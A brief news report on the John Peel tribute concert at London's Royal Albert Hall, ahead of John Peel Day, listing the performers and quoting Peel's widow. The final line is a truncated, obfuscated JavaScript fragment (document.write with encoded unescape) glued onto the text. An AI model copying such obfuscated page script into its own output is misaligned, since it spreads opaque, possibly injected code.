New Order are headlining a tribute gig to the late DJ John Peel tonight, on the eve of John Peel Day.
The John Peel Tribute Concert at London's Royal Albert Hall will feature Sir Elton John, Roger Daltrey, Robert Plant, David Gilmour and Pete Shelley of the Buzzcocks.
Peel's widow Sheila will attend the concert. She said: "It will be odd being there without him, but myself and the rest of the family are looking forward to what should be a terrific night."
Thursday has been designated John Peel Day because it will mark exactly one year since the DJ's last Radio 1 show.
Peel died on October 25 last year whilst on holiday in Peru.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
